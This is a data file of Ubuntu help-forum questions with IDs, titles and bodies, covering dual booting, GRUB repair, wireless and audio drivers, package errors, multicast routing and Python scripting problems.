348896	upgrading ubuntu 12.10 to 13.04 using bootable usb alongside windows 7	how do i upgrade ubuntu 12.10 to ubuntu 13.04 using a bootable usb ? s i have a laptop , this is dual boot , ubuntu 12.10 and windows 7 . i want to upgrade to 13.04 using bootable usb .
348899	wireless networks not showing up in ubuntu 12.04	sorry if this is a repeat but the only one i found that was similar was closed without any answer . i just did a fresh install of 12.04 lts and had to do a few things to get it to recognize my wireless card broadcom 4320 . i can now see that it has wireless networks available but i can not get any networks to show up and trying to manually connect did not work either . any ideas ?
348900	how is rhythmbox supposed to work	i 'm completely confused by this thing . every time i play a new song it gets added to a playlist . so , when i want to play one particular song on loop it does n't work . it goes through every song i ever played one at a time and then loops . i tried creating a new play list with one song but i have no idea how to add a song to a playlist . when i go to edit - > `` add to playlist '' and click on the playlist i created , nothing happens . when i go to music - > import file and click on a song nothing happens . how is this supposed to work ?
348904	compressing songs on ipod to 128 kbps format ?	i want compress my itunes library to 128 kbps for more storage on my 4th generation ipod . i know you can do this on itunes but , how do you do it on ubuntu 13.04 ?
348905	dual boot problems , grub 2 fails to install	i have a laptop with a pre installed windows 8 . it uses uefi firmware . i tried to install ubuntu 12 alongside windows 8 and got an error : grub-efi-amd64-signed failed to install into /target . the installed system will not boot . any idea on how to rectify this ?
348909	any mechanical drive tweaks ?	noticed a couple of ssd-specific tweaks like putting log files to tmpfs , discard and noatime , etc . was curious if such tweaks would also work on mechanical drives or be advisable ? i noticed a little bit of a slow start with xubuntu ( takes about 10-15 secs for the desktop to load and settle once lightdm loads ) , was mainly looking for some things to help it out .
348913	how can i prevent programs from switching workspaces ?	i want to prevent programs from switching workspaces . if i 'm working in one workspace and a program in another workspace has a dialog box come up , it interrupts whatever i 'm doing . similarly , if i switch to a workspace , click to open a program , then switch back to the first workspace , the program will open in the workspace i 'm currently on , rather than the workspace i opened it in . basically , i want a program to be locked to a workspace and unable to switch . any suggestions are appreciated !
348914	how do i get around `` cd/dvd 'ubuntu 13.04_raring ringtail_-release amd 64 ( 20130424 ) is required '' , to install updates to ubuntu 12.04 ?	i am trying to load updates from ubuntu for 12.04 and am getting the following message that blocks the up dating . cd/dvd 'ubuntu 13.04 raring ringtail - release amd64 ( 20130424 ) ' is required please insert the above cd/dvd into the drive '/media/cdrom/ ' to install software packages from it . i am a total novice so please do not short cut how to fix problem .
348919	how do you use a dazzle dvc 100 capture card on ubuntu 12.04 ?	i 've been wanting to do it for a long time . ever since i installed ubuntu 12.04 . i looked at tutorials all over the internet , and had no luck . i tried these instructions , ( like another user ) and he found it working after updating his computer . it works like it should until i plug it in at the end . nothing on the computer recognizes it . help please . instructions i followed : here are the commands needed to install your device in a condensed version : open an applications -- > accessories -- > terminal and type : lsusb with your device plugged in the result should look something like this : bus 005 device 003 : id 2304:021 a pinnacle systems , inc. you will need to install a few programs to help compile the driver . in the same terminal type : sudo apt-get install mercurial build-essential you need to use mecurial you installed in the previous step to retrieve the source module . first you deed to create a directory to download the module source to : mkdir ~/src this command creates a directory called src in you home directory . next change directory to src : cd ~/src this next command : hg clone http : //linuxtv.org/hg/v4l-dvb downloads the module source to the directory you just created , go get a cup of your favorite beverage as this step may take a while . cd v4l-dvb the above command changes directory to the directory that was created when the module source was retrieved . the next step is to compile the source : make you will see some errors , but it is safe ignore them . the final step is to install the modules : sudo make install once this step is done the driver for your device should load automagically when the device is plugged in .
348920	show all open browser windows in firefox	if i have fire fox open , then open a new window , from a link or from the file menu , i have to drag the first window out of the way to get to the other . is there a way to show the other open windows ? this is also a pain with pop-ups , as i could have 20 windows open .
348923	ca n't boot on windows 8 because of grub	so here i am again for another question . my asus sonicmaster has a little problem : i ca n't boot to windows 8 because it shows my this following error message : `` error efidisk read error . minimal bash-like editing ... . ect ... . device and files completions . '' then , displays `` > grub '' or something like that . ok , i know this error is very present all over the web but my case is a bit special . everytime i write `` find '' or `` boot '' ect ... it says it does n't exist . since i installed linux mint 15 alongside it , for both linux mint and windows , it displayed this message . but i deleted the partition , overwrote it and recreated my partition . then i rebooted and bam same error . so , i decided to install debian 7.1.0 to erase this f grub and ... i can boot on debian very well , but windows it fails . so , i : need windows for tomorrow classes need windows to work on some project do n't have any backup dvd or usb was stupid installing linux mint alongside windows 8 am in big trouble if this ca n't be fixed . appreciate every suggestion . thank you very much , this is an emergency ! best regards , the drummer from kubuntu
348926	unable to create a new partition for windows	i have only ubuntu installed and now i need to install windows 7 . i 'm using gparted for that , however , i ca n't create a new partition since most of the menu items are disables including partition - > new .
348928	netgear wifi card not shown after installing ndiswrapper driver	i am using ubuntu 12.04 . so far , i have done everything installing a netgear wifi w311 card . when i do ndiswrapper -l , it shows driver installed , device present but when i do iwconfig it says ppp0 no wireless extensions lo no wireless extensions eth0 no wireless extensions please help .
348929	setting up ubuntu 13.04 home server	i am currently attempting to set up a home server using ubuntu 13.04 . i am following instructions from http : //linuxhomeserverguide.com/server-config/webmin.php accurately as far as i can tell . i 've made it past the installation on the host machine , and attempted to connect to it using ssh on my main pc . i 've tried establishing the connection using `` ssh [ user ] @ [ hostname ] '' and many different variations using the server 's ip address/user/hostname , however i 'm constantly met with ... '' ssh : could not resolve hostname [ hostname ] : no such file or directory '' . i have also confirmed that my host name is correct by typing `` hostname '' in the command line on the server . i have very little experience with this sort of thing , and may be in over my head , but any help would be appreciated - thank you !
348932	uninstalled jackd* and sound does n't work	i used apt-get remove jackd* and it removed all the following packages : fxcyberjack tuxguitar-jack libjackrabbit-java liquidsoap-plugin-jack slv2-jack qjackctl jackmeter jacktrip jack-capture projectm-jack libjack0 libbjack-ocaml-dev-1hbn1 qjackrcd zynjacku libjack-jackd2-0 libbjack-ocaml-dev silentjack jack-mixer libbjack-ocaml jack-keyboard pulseaudio-module-jack jackd1 jackd2 libjackson-json-java-doc dssi-host-jack jacksum jackeq libjack0.100.0-dev libjack-jackd2-dev jack-stdio pulseaudio-module-jack-dbg jack-rack jackd2-firewire libifd-cyberjack6 vlc-plugin-jack libjack-0.116 jack-tools libjack0.71.2-0 jack libbio2jack0 jackd1-firewire alsaplayer-jack xmms2-plugin-jack libbio2jack0-dev jackd libbjack-ocaml-1hbn1 jackd-firewire jack-daemon snd-gtk-jack libjack-dev libjackson-json-java gjacktransport azr3-jack libjack-dev libjack-jackd2-0 libjack-jackd2-dev libjack0 pulseaudio-module-jack pulseaudio-module-jack-dbg alsaplayer-jack azr3-jack dssi-host-jack fxcyberjack gjacktransport jack jack-capture jack-keyboard jack-mixer jack-rack jack-stdio jack-tools jackd jackd1 jackd1-firewire jackd2 jackd2-firewire jackeq jackmeter jacksum jacktrip libbio2jack0 libbio2jack0-dev libbjack-ocaml libbjack-ocaml-dev libifd-cyberjack6 libjackrabbit-java libjackson-json-java libjackson-json-java-doc liquidsoap-plugin-jack projectm-jack qjackctl qjackrcd silentjack slv2-jack snd-gtk-jack tuxguitar-jack xmms2-plugin-jack zynjacku vlc-plugin-jack the problem is that it should removed only those packages : jackd jackd1-firewire jackd1 now , when i go to system settings > sound it does n't detect any inputs/outputs , but the sound works . the command lspci | grep audio outputs : 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) how should i proceed ? thanks !
348933	display lock screen message in kde	i would like to display a message such as will be back in 10 minutes when you lock your screen in kde ? i could not find an option in the system settings . how do you display a message when you lock your screen in kde ? i just want the ability to type my message which would get displayed on your lock your screen . the lock screen should show what it displays by default plus my message that i typed .
348936	no mouse pointer when using a touch screen	( into ) good day every one . i have been trying for the past 7 days to make my pointer appear with a touchscreen . ( i almost hate asking after working with ubuntu for 8 years , boy those late nights . ) in the past i been able to find the answer by searching and experimenting with commands . this time i was not able to do so . i 'm trying to make the mouse pointer appear ; at first thought it was a bug but nope it is not . it is something to do with the usb port ( i think is udev issue ) . i 'm using elo usb touch screen monitor . ( i need it as a pos and since my brother 's employees may not be computer literate they might freak out with a computer without a pointer . ) if i connect usb touchscreen and mouse and restart , the mouse works but the pointer is hiden . everything works fine just no pointer . if i reboot and connect only mouse , then connect usb touch screen both work great and pointer stays visible . i have tried to use udev.rules to prevent usb port from activating but no avail . my idea was to prevent the kernal from activating a specific port ( as if nothing was plugged it ) and once everything loads and i log into user , then use an automatic script . that will reactivate that port as if a device was just plugged in . ( i could unplug the usb everything i reboot and plug it in once it loads . ) not urgent but any ideas appreciated . i will set up server in meantime . thanks . $ lsusb bus 002 device 002 : id 04e7:0050 elo touchsystems 2216 accutouch速 touchmonitor interface $ : for device in $ ( ls /sys/bus/usb/devices/*/product ) ; do echo $ device ; cat $ device ; done /sys/bus/usb/devices/2-1/product elo touchsystems 2216 accutouch速 usb touchmonitor interface i 'm running ubuntu 12.10 but will be upgrading .
348938	ca n't load windows 8 after removing ubuntu	like the tittle says , i 'm unable to load into windows 8 after i uninstalled ubuntu 13.04 . when i boot up the pc all i get is the grub rescue thingy . i 've read that i have to fix the bootloader with the windows 8 disk . my problem is that my pc came with windows 8 pre installed so i dont have any cds or usb with this disk . are there any other options for me rather than downloading a windows 8 iso and loading through a usb stick and repairing it form there ? please help ! ! thanks !
348939	gmp 5.1.2 library installation error	i am trying to install gmp 5.1.2 library on my ubuntu 12.04 . i am following the standard commands to install the library as specified in its documentation . but it shows some error in the last step as : make [ 3 ] : *** [ install-info-am ] error 1 make [ 3 ] : leaving directory `/home/guest/gmp-5.1.2/doc' make [ 2 ] : *** [ install-am ] error 2 make [ 2 ] : leaving directory `/home/guest/gmp-5.1.2/doc' make [ 1 ] : *** [ install-recursive ] error 1 make [ 1 ] : leaving directory `/home/guest/gmp-5.1.2' make : *** [ install ] error 2 please help me get out of this mess .
348940	the fastest way to create a file from a terminal	what is the simplest way to create a file using a command-line ? usually i use : touch filename but is this the simplest/fastest way ?
348942	why does my python script fail with syntax errors ?	while running the simple python program below , i 'm getting the following error : ./url_test.py : line 2 : syntax error near unexpected token ` ( ' ./url_test.py : line 2 : `response = urllib2.urlopen ( 'http : //python.org/ ' ) ' import urllib2 response = urllib2.urlopen ( 'http : //python.org/ ' ) print `` response : '' , response # get the url . this gets the real url . print `` the url is : `` , response.geturl ( ) # getting the code print `` this gets the code : `` , response.code # get the headers . # this returns a dictionary-like object that describes the page fetched , # particularly the headers sent by the server print `` the headers are : `` , response.info ( ) # get the date part of the header print `` the date is : `` , response.info ( ) [ 'date ' ] # get the server part of the header print `` the server is : `` , response.info ( ) [ 'server ' ] # get all data html = response.read ( ) print `` get all data : `` , html # get only the length print `` get the length : '' , len ( html ) # showing that the file object is iterable for line in response : print line.rstrip ( ) # note that the rstrip strips the trailing newlines and carriage returns before # printing the output .
348944	how can i get iball usb tv tuner card to work ?	i have an iball usb tv tuner card which only has windows drivers . i could not get it to run on ubuntu 13.04 . when i run lsusb , i get the following : drdanand @ drdanand-hp-pavilion-g4-notebook-pc : ~ $ lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 003 : id 1b80 : a418 afatech bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 148f:2000 ralink technology , corp . bus 002 device 003 : id 04f2 : b2f4 chicony electronics co. , ltd drdanand @ drdanand-hp-pavilion-g4-notebook-pc : ~ $ my device is the one that reads afatech . what do i do ? are there any properitary drivers ? please help .
348946	openjdk7 installation error ( broken packages )	need your help to resolve the below error . # cat /etc/lsb-release distrib_id=ubuntu distrib_release=10.04 distrib_codename=lucid distrib_description= '' ubuntu 10.04.4 lts '' # apt-add-repository ppa : openjdk/ppa # apt-get update # apt-get install openjdk-7-jdk reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : openjdk-7-jdk : depends : openjdk-7-jre ( > = 7~b117~pre1-0lucid1 ) but it is not going to be installed e : broken packages apt-get install openjdk-7-jre reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : openjdk-7-jre : depends : openjdk-7-jre-headless ( > = 7~b117~pre1-0lucid1 ) but it is not going to be installed e : broken packages thanks in advance .
348947	skype crashes saying problem with audio capture	i have a lenovo thinkpad e430 . i have installed ubuntu gnome on it . i installed skype 4.2.0.11 and it has never worked for me . calling echo/sound testing service crashes saying problem with audio capture . does anyone have a clue as to how to fix this ps : i have never installed any sound related driver or software .
348949	mplayer svn r34540 update	how can i update my mplayer to latest version ? i am using mplayer integrated with smplayer .
348952	computer will not boot	this is my first time using/installing ubuntu . i booted from a usb and it was running , however when i started to `` install '' it for the second time ( getting rid of windows completely ) half way through this second install the laptop froze . i shut it down and to my horror it will not start , it just has a black screen with a cursor bar flashing in the top right hand corner . i assume that it did n't fully install ubuntu and it wiped windows and it wont load ubuntu as i need windows to do that . any ideas on how to fix this ? thank you
348953	how to install flash player on ubuntu unity	ok ive landed myself in quite the prediciment . i got a chromebook from my school and my robotics teacher noticed i was very good with computers . so he made a deal with me . he came up with challenges for me and said that i wont get into any trouble at my school . one was to disable all administrative monitoring etc ... i completed all of them with ease but my latest test is to download software to a chromebook we agreed on like steam or minecraft . i managed to figure out that you have to be in linux in order to install software and well ... im a n00b when it comes to linux all the branches of it and what not . and i need help im running 32 bit on unity ubuntu 12.04 i believe.there is no flash player in the software center . and iv tried a ton of code in terminal and none of them worked . if someone could help me to install it along with how to get minecraft or install steam on this that would be amazing . a step by step intro and im willing to do anything even power wash to get it -thank you
348954	how can i make onboard , the visual keyboard , open in ubuntu on startup ?	i am working with an application using a touch screen . for this , i need onboard ( the on-screen keyboard ) to open from ubuntu 's startup time with a fixed width and height . i also need to get a reserved screen position for placing onboard ( which means that onboard should not be in front of any application windows ) . i 'm using ubuntu 12.04 lts . onboard was not installed in my system . i installed it by typing sudo apt-get install onboard in the terminal . it does n't work properly . now the system shows onboard when i type onboard in the terminal . onboard closes itself when i close the terminal .
348955	ubuntu 12.04 bluetooth problem	i turn on bluetooth service from command line sudo service bluetooth start and check status of bluetooth service it showing me bluetooth is on . when i try to search my laptop for connection it 's not showing me my laptop in that list . what is the problem . need help . thank you .
348967	forwarding multicast packets in wired-wireless-nat-router	i am receiving iptv ( multicast ) from my isp ( deutsche telekom ) and it is already working without any issues for the main receiver which is directly connected to my dsl router ( avm fritz ! box 7390 ) . now , there is another receiver that can not be connect by ethernet wire . so , i 've tried to create a wireless-wired-bridge with my notebook , which does n't work , because bridges can only include eth interfaces or wireless interfaces in master mode . -- -- -- -- -- -- wireless -- -- -- -- -- wired -- -- -- -- -- |dsl router| ) ) ) ( ( ( |notebook| -- -- - |receiver| -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- wlan0 eth0 receiving multicast on my notebook via wireless interface wlan0 is working fine ( signalled with igmpv2 ! ) . when i add a virtual route to 224.0.0.0/4 via eth0 , the application ( vlc media player ) is trying to join multicast groups by signalling with igmpv3 ( i am following traffic flows with wireshark ) . can that be a problem for forwarding multicast packets later ? the second receiver is directly connected to my notebook . it does n't matter , whether i realize this by native routing or by nat'ing the traffic going out on wlan0 : unicast is working fine , but multicast is not forwarded . dhcp server is running on notebook and routing directive to the new subnet is also added on the dsl router . i also tried adding multicast routes on the notebook ( 224.0.0.0/4 via dev eth0 and/or via wlan0 ) but i did not have success . the easiest solution would be getting some powerline adapter which support igmpv3 and multicasting , but i 'd like to get this stuff working with the notebook as a router , because later this part should be played by a raspberry pi . is it possible to forward multicast packets on linux ? which rules are neccessary= can i realize the eth bridge with managed wlan0 without compiling my own kernel version ? thanks in advance erik
348973	the convenience win+r/run command	how can i achieve the convenience the win+r , more widely known as run command , provides in windows , in ubuntu ? e.g . : go to path open a file in default application
348974	how to prevent my screens from turning off , when the screen is locked ?	i would like to have my screen fully powered at all times , but it goes to standby once i lock my pc .
348975	installing 'requests ' using easy_install	i 'm trying to install 'requests module ' using easy_install but i 'm getting the following error : $ sudo easy_install requests processing requests error : not a recognized archive type : requests if i try with pip , i get the following error : $ pip install requests unknown or unsupported command 'install'
348976	how to install apps by terminal ?	i 'm new to ubuntu and i want to know how to install a program which is compressed in the format tar.bz2 or tar.gz.i downloaded an app called prozilla and it was compressed.i extracted it and it exists on my desktop with the name prozilla-1.21.1.my username is bolt ( for e.g. ) . please give me the necessary commands to be typed in terminal to install it .
348980	how do i unzip multiple files in a directory , not from the terminal ?	i have a very large directory of zipped files , and unzipping them via the terminal using unzip \\*.gz returns the following error : end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . i googled the error and it seems this is due to my download being incomplete/corrupt . however trying to extract individual files using the archive manager works perfectly . i downloaded the directory again and got the same error . so is there a way to extract multiple files using the archive manager , or some other way besides the command line ( which is not working for me ) ?
348981	disable second screen on the login screen but enable once login has completed	i currently run ubuntu 13.04 . i recently got a second screen for my computer and i have noticed because they are different resolutions ( one is 4:3 , one is 16:10 ) the login screen is duplicated and stretched . is there anyway to disable the second screen on boot and then turn it on again after login ? i would assume i would have to add a script to init.d , which i tried but it did n't seem to work . my primary monitor ( the one i want to keep on ) is 16:10 and is plugged in via dvi and my secondary monitor is 4:3 and is plugged in via display port .
348982	skype sound problem	i am using ubuntu 12.04 ( 64-bit ) but there is no sound for skype . i have tried to solve it in different ways from the website , the problem has not been resolve .
348983	wireless repeater wo n't work !	i have two access points where i 'm staying , 1st one working as access point and the other as repeater , the problem that my laptop wo n't connect while i 'm in the repeater area . was thinking maybe the solution to add a custom gateway to the route , but i do n't know if that will work and how to do it ? my wireless adapter is ( broadcom corporation bcm4313 ) and i 'm using `` bcmwl-kernel-source '' driver . thank you .
348988	ubuntu 12.04 and microsoft sculpt keyboard	there is some misunderstanding between my dell laptop with ubuntu and microsoft keyboard . when using default bluetooth software , keyboard is found , but bluetooth manager 's pairing finishes with 'unable to connect ' message . blueman detects keyboard , but unable to connect it too . but , this sequence of commands connects it without any password : hcitool scan sudo hidd -- connect 00:12 : a1:63:34:6e howevere even in this case after 15 minutes idle , keyboard switches to sleep mode , and can not be properly connected back . on the other hand this keyboard successfully connects to all my android device . in this case i have this connecting flow : choose keyboard device in list of found device android device generates unique pass ( like 6789 ) after password input using keyboard keys devices are paired in my opinion something like this should happend when connecting to laptop . so , if you know any way to solve this issue without becoming bluetooth-hacker and patching bluetooth stack i 'll be very appreciate .
348990	why am i getting socket.gaierror with httplib ?	the aim of my program is to send a post a request to login page , but i 'm getting following error . # ! /usr/bin/env python import httplib , urllib conn = httplib.httpconnection ( `` localhost '' ) conn.request ( `` get '' , `` /xampp/mantisbt-1.2.2/login_page.php '' ) r1 = conn.getresponse ( ) print r1.status , r1.reason data1 = r1.read ( ) params = urllib.urlencode ( { 'username ' : 'administrator ' , 'password ' : 'kumarswamy10 ' } ) headers = { `` content-type '' : `` application/x-www-form-urlencoded '' , '' accept '' : `` text/html '' } conn = httplib.httpconnection ( `` localhost/xampp/mantisbt-1.2.2/login.php '' ) conn.request ( `` post '' , '' localhost/xampp/mantisbt-1.2.2/login.php '' , params , headers ) response = conn.getresponse ( ) print response.status , response.reason data = response.read ( ) conn.close ( ) output : 200 ok traceback ( most recent call last ) : file `` ./client_postnew.py '' , line 11 , in < module > conn.request ( `` post '' , '' localhost/xampp/mantisbt-1.2.2/login.php '' , params , headers ) file `` /usr/lib/python2.6/httplib.py '' , line 910 , in request self._send_request ( method , url , body , headers ) file `` /usr/lib/python2.6/httplib.py '' , line 947 , in _send_request self.endheaders ( ) file `` /usr/lib/python2.6/httplib.py '' , line 904 , in endheaders self._send_output ( ) file `` /usr/lib/python2.6/httplib.py '' , line 776 , in _send_output self.send ( msg ) file `` /usr/lib/python2.6/httplib.py '' , line 735 , in send self.connect ( ) file `` /usr/lib/python2.6/httplib.py '' , line 716 , in connect self.timeout ) file `` /usr/lib/python2.6/socket.py '' , line 500 , in create_connection for res in getaddrinfo ( host , port , 0 , sock_stream ) : socket.gaierror : [ errno -2 ] name or service not known
348992	loading ubuntu os	when i try to type anything in the username box the text shows as `` gobbledygook '' and not as english . i have set english uk in the settings and also redone it in the options on the sign in page . any ideas please .
348993	upgrading ubuntu 13.10 daily live edition	i have installed ubuntu 13.10 'daily live ' for testing purposes . is it possible to upgrade it to a full-fledged 13.10/14.04 when it gets released ?
348994	vlc missing the mts2 codec in ubuntu 12.04 lts	avconv -codecs does not show the mts2 entry . where can i find this codec and how can i install this codec ? thanks for helping
348999	how to use the latest stable version of org-mode ?	is there a ppa for org-mode ? i 'm using ubuntu 12.04 . if not , can i install the latest stable version of org-mode for emacs manually ?
349001	making a service from the project	hi i have a java server ( it listens ) which runs when i do : ant compile jar run in the terminal what i want to do is sudo service myproject start so that i wo n't have to be in terminal ( when i do ctrl+c in terminal or close the terminal the program stops which i do n't want ) how can i do that ?
349003	how to install ubuntu 12.04 on dell pe r720 ?	i am trying to install ubuntu 12.04 on a new server dell pe r720 . i tried to find a document on how to do the installation especially we have raid h710 in the server . what should be the sequence ? use dell openmanager to configure to configure raid then use lvm on the ubuntu installation ? or should i try to find version from openmanager that support ubuntu to use it for configuring raid and install ubuntu as well ?
349004	ca n't open software center help !	i am totally new to linux so i do n't know how to do anything : s i was trying to open software center ( to install spotify ) but i always get this error message : please run this software with administrative rights . to do so , run this program with kdesudo . hope that somebody can help me with this
349006	driver canon scanner lide 210	pls help me to find driver canon scan lide 210. any one can support a link for driver canon scan lide 210 . os ubuntu 12.04 lts , linux thanks
349007	ns2 package not located in ubuntu 13.04	i have installed ns2 on ubuntu 12.04 and there never have been any problem . now with 13.04 , it gives this message `` unable to locate the package : ns2 '' . whether i try it through software centre or through terminal . same message . please help me in this .
349010	computer randomly loggin-out on ubuntu 13.04	this happens really randomly , usually while i am typing something . any idea what it could be ? in case that can help , here 's my logs from pastebinit ~/.xsession-errors http : //paste.ubuntu.com/6144800/ edit happened again . logs from system logs/xorg.0.log just after relogging : http : //paste.ubuntu.com/6155272/
349014	install ubuntu on windows uefi	i have sony vaio computer having windows 8 64-bit installed ( in uefi mode ) on it . i want to install ubuntu alongside windows 8 . steps i followed : disabled fast-startup disabled secure boot inserted ubuntu live dvd reboot result : windows 8 loads without detecting the dvd i checked this link : https : //help.ubuntu.com/community/uefi but all the solutions it showed are after the dvd has been detected . my problem is my computer is not detecting the dvd as long as the uefi mode is enabled . it only detects the dvd in legacy mode . if i install ubuntu in legacy mode , it works but then windows 8 does n't load . please help !
349015	no live file system	used ubuntu universal usb installer ubuntu 12.04.3-desktop-i386.iso created stick boot device tried to install get : `` unable to find a medium containing a live file system '' system then times out// kills all processes// shuts down i think i need help .
349017	windows does not appear in the grub list	i have ubuntu 13.04 and i want to add win7 . my problem is that the win7 disk is not recognized or not loaded after i restart , so i cant even start the installation . the grub gives me the usual suggestions about loading ubuntu or running memory tests . i 've seen some text that says that i should install win7 before ubuntu . my qs : do i have to uninstall ubuntu first ? can i ask the grub to load the win7 installer ? in case i need to remove the ubuntu first , does deleting all the partitions from the hd is enough or should i use os-installer from livecd etc ? for your time tamir
349019	playstation3 via hdmi input on ubuntu audio issue	i have an alienware m17xr3 laptop with switchable radeon hd6990 and hdmi input . when i connect a playstation 3 everything works fine , but there is no sound . has anyone any idea why there is no sound or how to fix it ?
349020	tmux - unable to start any gui application	i am running ubuntu-gnome 13.04 . my default shell is zsh 5.0.0 and i usually run tmux 1.7 in the terminal 3.6.1 . in terminal , if i evince or gedit , the applications start as expected . i can append an & , too . but if i start tmux and from tmux if i strat evince or gedit , it gives an error : ( evince:19053 ) : eggsmclient-warning ** : failed to connect to the session manager : could not open network socket how can i correct the situation ?
349021	what 's the difference between -p tcp and -m tcp in iptables ?	i just noticed an entry in /etc/sysconfig/iptables along the lines of -a input -p tcp -m tcp -- dport 138 -j drop i am not so sure why there has to be two switches here for matching protocol tcp , that is , -p tcp and -m tcp . is there any difference between them ?
349023	kubuntu 12.04 lts dvd : apt-get not finding the dvd after initial installation , cant install packages	i 'm trying to install using the kubuntu 12.04 lts dvd . after installation , and without touching anything in /etc/apt/ . my system is disconnected from the internet , so the dvd is my only source for packages . now , after the dvd-run installation is complete , i boot the system , open a shell , become root , and try to apt-get install gcc - and it does n't work ... i get failed to fetch cdrom : [ etc etc ] etc . etc . file not found this question is almost identical , but the answer there did n't help me . i was able to make it work by using file : apt entries , and mounting the dvd myself , but i want to know why it does n't `` just work '' out of the box and what 's the minimum i need to do to get it to work .
349025	how to setup 2 monitors and specify workplaces ?	i am using ubuntu 13.04 desktop with 2 monitors and i want to use a specific workplace shown only on my 2nd monitor . when i switch workplaces on my 1st monitor , i do n't want the 2nd one to be affected . for example ; i am running a vm or a terminal window on one of my workplaces and assign that workplace to my 2nd monitor so even if i switch between workplaces on my 1st monitor , i can still see the terminal or a vm on my 2nd one . is there an option like that to assign a workplace on a specific monitor ? i have nvidia quadro 2000 graphic card on my system .
349030	why ca n't i able to open the synaptic manager and ubuntu software center ?	i 'm not be able to open synaptic and the software center and nothing is downloaded to my ubuntu system . sudo apt-get install returns the following error . reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_quantal-security_main_i18n_translation-en % 5fus e : the package lists or status file could not be parsed or opened .
349033	acpi warnings in logs	on ubuntu 12.04.3 with kernel 3.8 this message appears in the kernel.log and the syslog . sep 23 12:24:06 laptop-allard kernel : [ 6.988503 ] acpi warning : 0x0000000000000428-0x000000000000042f systemio conflicts with region \gpis 1 ( 20121018/utaddress-251 ) sep 23 12:24:06 laptop-allard kernel : [ 6.988511 ] acpi warning : 0x0000000000000428-0x000000000000042f systemio conflicts with region \pmio 2 ( 20121018/utaddress-251 ) sep 23 12:24:06 laptop-allard kernel : [ 6.988515 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver sep 23 12:24:06 laptop-allard kernel : [ 6.988519 ] acpi warning : 0x0000000000000530-0x000000000000053f systemio conflicts with region \gpxx 1 ( 20121018/utaddress-251 ) sep 23 12:24:06 laptop-allard kernel : [ 6.988522 ] acpi warning : 0x0000000000000530-0x000000000000053f systemio conflicts with region \pmix 2 ( 20121018/utaddress-251 ) sep 23 12:24:06 laptop-allard kernel : [ 6.988525 ] acpi warning : 0x0000000000000530-0x000000000000053f systemio conflicts with region \gpio 3 ( 20121018/utaddress-251 ) sep 23 12:24:06 laptop-allard kernel : [ 6.988528 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver sep 23 12:24:06 laptop-allard kernel : [ 6.988530 ] acpi warning : 0x0000000000000500-0x000000000000052f systemio conflicts with region \gpxx 1 ( 20121018/utaddress-251 ) sep 23 12:24:06 laptop-allard kernel : [ 6.988533 ] acpi warning : 0x0000000000000500-0x000000000000052f systemio conflicts with region \pmix 2 ( 20121018/utaddress-251 ) sep 23 12:24:06 laptop-allard kernel : [ 6.988536 ] acpi warning : 0x0000000000000500-0x000000000000052f systemio conflicts with region \gpio 3 ( 20121018/utaddress-251 ) it happens with my laptop and also with my computer . does anyone now what this means ?
349034	write to usb flash drive extremely slow	when i 'm copying a copying a large file to a 8gb pendrive , the write crawls at some 10 's of kb/s . even after killing the process with ctrl+c , the writing continues for several minutes . ( the task manager applet and the `` bo '' field of vmstat ) this happens intermittently and sometimes can be fixed by remounting the drive . what could be causing this ? ( i think it 's something in the kernel , because killing the process doest how could i debug/find out what is happening ?
349036	will installation of ubuntu 13.04 overwrite installed ubuntu 11.04 and keep windows xp ?	i want to replace ubuntu 11.04 with ubuntu 13.04 and keep windows xp . perhaps i should put this question on hold because a 2nd comment on my message suggested that i may not need to do the graduated upgrades , but that a simple directed overwrite can be done . the two paragraphs below are based on other reading . if i do the incremental upgrades of os : os 11.04 to 11.10 ; os 11.10 to 12.04 and then upgrade to either 12.04lts or 13.04 , can this be done without losing the windows xp that i want to keep ? i have an old cad program i like to run on the windows xp , but i prefer using ubuntu for other things . the reason i am asking is the cd tryout disk instructions are not specific about overwriting an old ubuntu os while keeping another os ( such as windows xp ) ? i do not know what the dual boot does when installing the os [ ? ] . any suggestions would be appreciated .
349042	laptop immediatly goes to sleep after disconnecting power	i 've lenovo s400 laptop , dual boot with windows 7 and ubuntu 13.04 . the problem is that whenever i disconnect the power adapter , ubuntu shows that battery level is critically low and goes to sleep . when i resume it from sleep , it runs fine on battery power . the problem might be the lenovo power management installed in windows . when i set it to battery health mode , the battery does n't charge over 60 % and is good for battery health . if i use the laptop mostly connected to power , and that 's when it causes the sleep problem . when it is set to battery full charge mode , ubuntu just shows a warning of low battery for a moment but then runs fine . in either case , the battery meter never works ( shows 1 % battery charge ) while connected to power . it looks like ubuntu takes a couple of seconds to detect the correct battery level and that 's creating all the problem . lenovo does n't provide any driver for ubuntu . a faulty battery meter ( only when connected ) is not an issue but the sleep problem is a bummer . what can i do ?
